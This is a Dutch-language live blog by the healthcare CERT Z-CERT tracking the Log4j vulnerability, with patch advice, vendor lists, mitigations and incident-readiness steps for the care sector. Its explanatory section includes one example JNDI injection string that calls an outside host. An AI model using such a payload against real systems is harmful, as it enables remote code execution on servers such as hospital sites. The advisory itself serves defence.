Search
Lees Voor
CVD melden Deelnemer worden
NL EN
Search

Live blog java kwetsbaarheid Log4J

Er zit een ernstige kwetsbaarheid in de java log-tool Apache Log4j. Deze logtool wordt heel veel gebruikt. De eerste geluiden hierover kwamen donderdagavond (9 december) online. Binnen 24 uur hebben cybercriminelen al misbruik gemaakt van deze zero-day. Via dit live blog houden we de zorgsector op de hoogte van de ontwikkelingen rondom deze kwetsbaarheid.

woensdag 19 januari

Dit liveblog is voorlopig afgesloten. Indien er ontwikkelingen zijn rondom Log4j zal het liveblog weer worden geopend en vind je hier updates.
Bedankt voor het volgen.

Woensdag 29 december

Ook 2.17 is kwetsbaar

Er is een kwetsbaarheid gevonden in versie 2.17 van Apache Log4j. Deze kwetsbaarheid stelt een kwaadwillende in staat om willekeurige code uit te voeren. Om deze kwetsbaarheid te misbruiken moet een kwaadwillende rechten hebben om het logging configuratie bestand aan te mogen passen. Z-CERT heeft haar deelnemers hierover geinformeerd via een operationeel alert. De kans op misbruik is klein. Maar gezien de recente aandacht rondom Log4j is het belangrijk om hier wel kennis van te nemen.

Vrijdag 24 december

Kerstdagen

Ook tijdens de komende feestdagen is team Z-CERT bereikbaar voor deelnemers. We zijn bereikbaar op het bekende piketnummer.
We wensen iedereen mooie dagen toe.

Woensdag 22 december

Veelgestelde vragen en antwoorden

Vorige week hielden het Digital Trust Center, het NCSC en CSIRT-DSP een webinar over de Log4j kwetsbaarheid. Naar aanleiding hiervan hebben veel kijkers vragen gesteld over Log4j. Deze zijn nu, samen met de antwoorden, te vinden op de webiste van het Digital Trust Center. Op deze pagina is ook de opname van het webinar terug te kijken.
De makers van de site zeggen geven een disclaimer bij de QA’s omdat de situatie rondom Log4j snel verandert: “We benadrukken daarom dat dit antwoorden zijn met de Log4j-inzichten tot 20 december.”

Maandag 20 december

Overzicht leveranciers zorggerelateerde producten

De lijst met kwetsbare applicaties op de Github pagina van het NCSC groeit nog elke dag. Z-CERT levert hier ook updates van medische leveranciers voor aan. Steeds meer leveranciers brengen informatie naar buiten over de log4j situatie. Tot nu toe heeft Z-CERT van de volgende leveranciers berichten gedeeld met het Nationaal Cyber Security Centrum.
Philips
Siemens
B. Braun
Dräger
Alphatron
BD
Boston Scientific
Canon
Johnson & Johnson
Viayre
Carestream
Resmed
Enovation
Infoland
Cepheid

Zaterdag 18 december

Update naar 2.17

De ontwikkelaars van Log4j hebben versie 2.17 beschikbaar gesteld. Versies Log4j 2.0-alpha1 t/m 2.16 zijn kwetsbaar voor DDoS aanvallen. Z-CERT adviseert het volgende: Wanneer u de update naar versie 2.16 nog niet heeft uitgevoerd, update direct naar de laatst beschikbare versie. Als u dit heeft afgerond, update applicaties van 2.16 naar 2.17.

Aangepast stappenplan

Het NCSC heeft het stappenplan aangepast.Kijk voor het meest actuele stappenplan op de website van het NCSC.

Vrijdag 17 december

Ministerie van VWS en Z-CERT informeren zorgkoepels

De zorgkoepels van Nederland hebben vandaag een bericht ontvangen van Z-CERT en het ministerie van Volksgezondheid, Welzijn en Sport over Log4j. In de brief roepen beide partijen, de koepels om om hun achterban te wijzen op de digitale dreiging en actie te ondernemen.

2.15 Nog kwetsbaarder dan gedacht

De situatie rondom update 2.15 is nog ernstiger dan eerder werd aangenomen. Uit onderzoek is gebleken dat CVE-2021-44228 misbruikt kan worden voor remote code execution. De technische details zijn te vinden in het beveiligingsadvies van Apache. Al eerder deze week adviseerden we te updaten naar 2.16.0. Voor Java 7 heeft Apache Log4j versie 2.12.2 als oplossing beschikbaar gesteld.

Heeft u een crisisteam paraat?

Het NCSC adviseert om voorbereid te zijn op een aanval. Maar hoe doe je dat? Zorg er voor dat incident response draaiboeken klaarliggen. Weet wie je moet contacteren in het geval van een incident. Zorg dat crisisteam paraat staat. Overweeg het tijdelijk instellen van piketdiensten. Houd de NCSC GitHub in de gaten voor de laatste informatie over indicatoren uit forensisch onderzoek.

Donderdag 16 december

Stappenplan

Bovenaan deze pagina staat een link naar een stappenplan over Log4j. Download het en deel het met collega’s. Een van de belangrijkste tips: houd rekening met het ergste. Formeer een crisisteam en zorg voor voldoende achtervang ivm de komende feestdagen.

Scannen

Hoe weet je of je log4j gebruikt en in welke software het zit? Er zijn diverse scans in omloop die je daarbij helpen. De scans zijn te vinden op de github pagina van het NCSC.

Update, update, update

Deelnemers van Z-CERT hebben vandaag een update van het Operationeel Alert ontvangen. Hierin adviseren we met klem om de update naar versie 2.16 uit te voeren. De update naar versie 2.15 bleek kwetsbaar voor Denial-of-Service aanvallen.

Woensdag 15 december

ZorgDetectieNetwerk

Ook vandaag blijven we onze deelnemers informeren. Zo gaan we met hen in gesprek via ons chatknaal TechOps, we plaatsen informatie over de status van verschillende zorggerelateerde soft- en hardware op de GitHubpagina van het NCSC, we houden een event bij in het ZorgDetectieNetwerk met Indicators of Compromise en we lezen veel achtergrondinfo.

Webinar

Het NCSC, Digital Trust Center en CSIRT-DSP organiseren een webinar voor IT-professionals over de kwetsbaarheid in Log4j softwarr. Dit webinar vindt plaats op woensdag 15 december om 16.00u. Aanmelden kan via de aanmeldlink Het webinar is bedoeld voor IT-specialisten ook uit de zorgsector.

Dinsdag 14 december

Operational Alert update

De ontwikkelaars van Log4j hebben versie 2.16.0 uitgebracht. De nieuwe versie van log4j schakelt de JNDI functie standaard uit. Daarnaast is de ondersteuning voor “Message lookups” verwijderd. De ontwikkelaars stellen dat het in deze release gaat om hardening-maatregelen.
Log4j2 is een onderdeel van vele soft- en hardware oplossingen ook in de zorg.

Factsheet Informatiebeveiligingsdienst

Onze collega’s van de IBD hebben een handig factsheet gemaakt over Log4j. Dat factsheet is hier te vinden.

Siemens en Philips

Leveranciers van zorggerelateerde apparatuur Philips en Siemens hebben een advisory uitgebracht naar aanleiding van Log4j.

Zorg gerelateerde systemen

Z-CERT heeft in overleg met het NCSC besloten om ook zorggerelateerde systemen aan te leveren voor de GitHub pagina van het NCSC. Aan alle deelnemers de oproep om hun bevindingen rondom kwetsbare zorggerelateerde systemen aan te leveren voor deze lijst. Dit mag door een pull request te doen op de GitHub pagina van het NCSC of deze informatie met Z-CERT te delen via de gebruikelijke kanalen.

Misbruik

Het Nationaal Cyber Security Centrum roept organisaties op om zich op misbruik van de java kwetsbaarheid voor te bereiden. Het NCSC acht het voorstelbaar dat misbruik kan leiden tot grote gevolgschade.

Maandag 13 december

Is mijn systeem geraakt?

Er zijn diverse tools beschikbaar waarmee je kan kijken of je Log4j gebruikt. Deze zijn;

Als je gebruik maakt van Log4j (en dat is hoogst waarschijnlijk), check dan via de volgende link of je systemen geraakt zijn.

Github

Het Nationaal Cyber Security Centrum (NCSC) heeft op Github een overzicht van kwetsbare applicaties geplaatst. In overleg met het NCSC zal op deze GitHub pagina ook informatie over op de zorg gerichte leveranciers en producten worden geplaatst.https://github.com/NCSC-NL/log4shell

Operational Alert

Z-CERT heeft een update verstuurd van de operational alert aan haar deelnemers. Z-CERT houdt contact met alle relevante stakeholders, zoals de andere CERT’s, het NCSC, de DIVD, en andere private partijen. Vanuit deze samenwerking draagt Z-CERT bij aan de verzameling van relevante in formatie op de Github page die het NCSC onderhoudt. In de komende dagen zullen er nog aanvullende berichten verschijnen omtrent deze kwetsbaarheid.

Wat is er aan de hand?

De java log tool Log4j is een zeer veelgebruikte tool. Deze tool helpt je met logging analyse. Deze tool verwerkt sommige onderdelen van de logging. Een van de manieren waarop Log4j de logging verwerkt is niet goed dicht getimmerd. Hierdoor kan een aanvaller willekeurige code uitvoeren.

Een aanvaller kan bijvoorbeeld een URL bezoeken op ziekenhuis.nl, denk hierbij aan bijv ziekenhuis.nl/artikel-over-covid19. Dat een aanvaller deze URL bezoekt komt in de logging terecht van de website. Als een aanvaller een speciaal gemaakte string hierin zet komt deze ook in de logging terecht. Denk hierbij aan bijv. ziekenhuis.nl/${jndi:ldap//awhcn0.dnslog.cn/a}. Log4j zal het dollarteken herkennen, en de inhoud tussen de haakjes zien als opdracht. Log4j zal vervolgens een aanvraag doen aan het domein en eventuele instructies die terugkomen uitvoeren. Een aanvaller kan hiermee dus op eenvoudige manier Log4j instrueren om commando’s uit te voeren onder de rechten waarmee Log4j draait.

Welke applicaties zijn kwetsbaar?

De java-programmeertaal wordt ingezet voor een heel divers palet aan softwareproducten en kan op zeer veel verschillende hardware typen draaien. Zo wordt het gebruikt in firewalls en andere netwerkapparatuur, maar ook b.v. voor sommige elektronische patiënten/cliënten dossiers en database gerelateerde producten van Oracle. De kans is groot dat in uw organisatie Java-applicaties draaien die gebruik maken van Log4j. Omdat Log4j “onder de motorkap” gebruikt wordt door applicaties is het vaak is het niet duidelijk welke applicaties allemaal Log4j gebruiken en moet dat worden uitgezocht. Het NCSC houdt een lijst bij van producten [5].

Wat merkt de zorgsector hiervan?

Tot nu toe is nog niet duidelijk welke zorgsystemen hierdoor kwetsbaar zijn. Z-CERTS analisten vergelijken Log4j met veelgebruikte ingredienten in de keuken, zoals zout en suiker. Dat vind je overal in terug. Het is dan ook zeer aannemelijk dat Log4j ook in veel zorgsystemen wordt gebruikt. De analisten maken zich zorgen deze ernstige kwetsbaarheid en de eenvoudige manier waarop criminelen hier misbruik van maken.

Steven Baardewijk, security specialist bij Z-CERT:
“Het is lastig over te brengen hoe ernstig deze kwetsbaarheid is. Elke keer als je een website/applicatie of game, zoals Minecraft, bezoekt komt informatie over jouw bezoek in de logging terecht. Criminelen passen deze ‘bezoekersinformatie’ aan om de kwetsbaarheid te misbruiken, heel praktisch: in Minecraft kon dit misbruikt worden door met anderen te chatten! Ze zetten de logging informatie naar hun hand door een commando toe te voegen, de kwetsbare website vraagt dan vervolgens aan de crimineel om instructies, zoals het installeren van malware. Een simpel website bezoek kan zo grote gevolgen hebben. We zien dat er criminelen al hard op zoek zijn naar kwetsbare systemen die gebruikmaken van Log4j. Ze zijn hier ookal succesvol in gebleken want het eerste misbruik is al waargenomen nog geen 24 uur na de bekendmaking van de kwetsbaarheid. Het is echt zaak om dit zo snel als mogelijk op te pakken.”

Wat moeten zorginstellingen doen?

Onderstaande advies is grotendeels gebaseerd op het stappenplan van het NCSC met enkele aanpassingen voor de zorg.

1. Inventariseer of Log4j v2 in uw netwerk wordt gebruikt. Hiervoor zijn verschillende scripts voor Linux en Windows beschikbaar. Ook verschillende kwetsbaarheidsscanners hebben updates of plugins uitgebracht om te controleren of systemen kwetsbaar zijn. U vindt deze op GitHub. Let wel: deze scans bieden geen 100% garantie dat u geen kwetsbare systemen heeft..

2.Wees u ervan bewust dat ook systemen zonder internetverbinding risico kunnen lopen. Aanvallen van binnenuit zijn ook mogelijk.

3.Indien u uw ICT heeft uitbesteed of een digitale dienst afneemt bij een leverancier, neem dan contact op met hen op om er zeker van te zijn dat zij hier de juiste aandacht voor hebben. Maak afspraken over hoe om te gaan met systemen waar nog geen patch voor beschikbaar is en waar mitigatie onvoldoende zekerheid biedt.

4. Controleer voor kwetsbare systemen of uw softwareleverancier reeds een patch beschikbaar heeft gesteld en voer deze zo spoedig mogelijk uit.

• Indien uw softwareleverancier nog geen patch beschikbaar heeft, neem dan contact met hen op.
• Indien het systeem informatie verwerkt afkomstig van het internet en er is geen patch beschikbaar, neem dan mitigerende maatregelen waar mogelijk.

5. Controleer voor kwetsbare systemen of uw softwareleverancier reeds een patch beschikbaar heeft gesteld en voer deze zo spoedig mogelijk uit.

  1. a.  Indien het systeem informatie verwerkt wat afkomstig is van het internet en er is geen patch beschikbaar, neem dan mitigerende maatregelen waar mogelijk.
    b.  Als updaten niet mogelijk is, adviseert Apache de volgende maatregelen:
    i.   Versie 2.10 of hoger: stel log4j.formatMsgNoLookups or Dlog4j.formatMsgNoLookups in op true
    ii.  Versie 2.7 of hoger: gebruik %m{nolookups} in de PatternLayout configuratie
    iii. Alle versies: verwijder de JndiLookup en JndiManager classes uit log4j-core.jar
    c.  Waar dit niet mogelijk is, adviseren wij te overwegen of het wenselijk is het systeem uit te schakelen totdat een patch beschikbaar is.
    d.  De Github lijst die het NCSC bijhoudt, kan u van informatie voorzien over nieuw uitgebrachte patches, maar wij raden aan zelf om ook pagina’s van softwareleveranciers te monitoren.

5. Controleer zowel systemen die al gepatcht zijn als ook kwetsbare systemen op misbruik. Wij adviseren te kijken naar misbruik vanaf ten minste 1 december. Z-CERT heeft op het ZDN (zorg detectie netwerk) IOC’s geplaatst die mogelijk kunnen helpen om misbruik vast testellen.

6. Wij adviseren u om detectiemaatregelen in te schakelen. Verschillende organisaties hebben voor detectiemaatregelen voor hun Firewall-producten beschikbaar gesteld. Ook voor het inschakelen van deze maatregelen geldt dat dit geen garantie biedt dat elke vorm van misbruik wordt tegengehouden.

7. Het is in sommige gevallen aan te bevelen om voor deze situatie een crisisorganisatie in te richten. Soms moeten er ingrijpende beslissingen genomen worden , waarvoor communicatie nodig is met interne en externe stakeholders.

8. De gevonden kwetsbaarheid kan gebruikt worden om een ransomware-aanval uit te voeren. Z-CERT adviseert om de juiste voorbereidingen te treffen, door capaciteit beschikbaar te houden en uw back-ups op orde te hebben.

8. Als u misbruik heeft geconstateerd, meld dit dan bij Z-CERT via [email protected]

Wat doet Z-CERT?

Z-CERT houdt contact met alle relevante stakeholders, zoals de andere CERT’s, het NCSC, de DIVD, en andere private partijen. Vanuit deze samenwerking draagt Z-CERT bij aan de verzameling van relevante in formatie op de Github page die het NCSC onderhoudt. In de komende dagen zullen er nog aanvullende berichten verschijnen omtrent deze kwetsbaarheid, houdt daarvoor de diverse kanalen in de gaten.

Is Log4j versie 1.x ook kwetsbaar?

Niet direct. Versie 1.x is kwetsbaar, maar niet in de standaard configuratie. Een aanvaller zou toegang moeten hebben tot het Log4j 1.x configuratiebestand en een waarde moeten aanpassen om deze vatbaar te maken voor deze kwetsbaarheid. Door deze benodigde stappen is de waarschijnlijkheid van deze aanvalsvector drastisch kleiner. Daarnaast zou een aanvaller die lees- en schrijfrechten heeft op een server dit waarschijnlijk direct misbruiken i.p.v. een configuratiebestand aan te passen ten einde een andere kwetsbaarheid te misbruiken.
Bronnen geven aan dat in versies 1.x de lookup niet is ingebouwd zoals dit in versies 2.x het geval is. Dat klopt, echter bevatten versies 1.x andere onderdelen die ook lookups doen. Hierom kunnen, na een configuratie aanpassing, deze andere onderdelen alsnog misbruikt worden. Het zou kunnen dat binnen uw installatie deze waardes zijn aangepast vanuit functionele redenen.

Hoe ziet Z-CERT deze dreiging?

Z-CERT ziet deze dreiging als zeer ernstig. Log4j wordt gebruikt in zeer veel applicaties waardoor het aanvalsoppervlak erg groot is. Omdat Log4j niet een op zich zelf staande applicatie is, maar een component in een applicatie, hebben partijen vaak niet een goed beeld van waar Log4j allemaal gebruikt wordt. Dit maakt het identificeren van kwetsbare applicaties lastig. Ook dit verhoogt de dreiging omdat partijen feitelijk met oogkleppen op moeten varen.

De dreiging wordt nog sterker verhoogd door de eenvoud waarmee de kwetsbaarheid is uit te buiten. Een eenvoudige string in de URL, User Agent, Referer, of waar dan ook, kan voldoende zijn. Verder is deze eenvoudige string makkelijk te versluieren waardoor detectie bemoeilijkt wordt. Hierdoor is het de inschatting van Z-CERT dat, sec, de inzet van een IPS niet afdoende is om alle scan- of aanvalspogingen tegen te houden.

Hetzelfde geldt voor pogingen om eventueel misbruik te detecteren. Ook hiervoor geldt dat het analyseren van de logging bemoeilijkt wordt door eventuele versluiering van aanvalspogingen.